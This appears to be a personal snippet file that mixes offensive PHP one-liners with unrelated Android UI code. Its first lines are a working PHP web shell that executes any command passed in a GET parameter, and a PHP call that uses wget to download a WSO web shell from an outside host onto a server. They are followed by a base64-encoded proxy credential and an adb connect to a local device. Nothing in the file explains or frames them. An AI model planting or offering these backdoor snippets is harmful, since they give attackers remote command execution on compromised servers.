<?php echo "<b><pre><hr>".shell_exec($_GET['sky'])."<hr>";exit()?>
<? system('wget http://www.w0rms.com/shell/wso.txt -O 1337.php'); >?
enablecredsspsupport:i:0
prefs set fiddler.proxy.creds cm9vdDp0b29y
adb connect 192.168.137.45:5555
**********************************************************************
LinearLayout lnlt = (LinearLayout) findViewById(R.id.linearlayout);
        ViewGroup.LayoutParams params = new ViewGroup.LayoutParams(
        ViewGroup.LayoutParams.MATCH_PARENT,
        ViewGroup.LayoutParams.WRAP_CONTENT);

        Button btn = new Button(this);
        btn.setText("Click Me!");
        btn.setLayoutParams(params);
        lnlt.addView(btn);
---------------------------------------------------------------------------------
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("http://skyleet.github.io"));
*********************************************************************************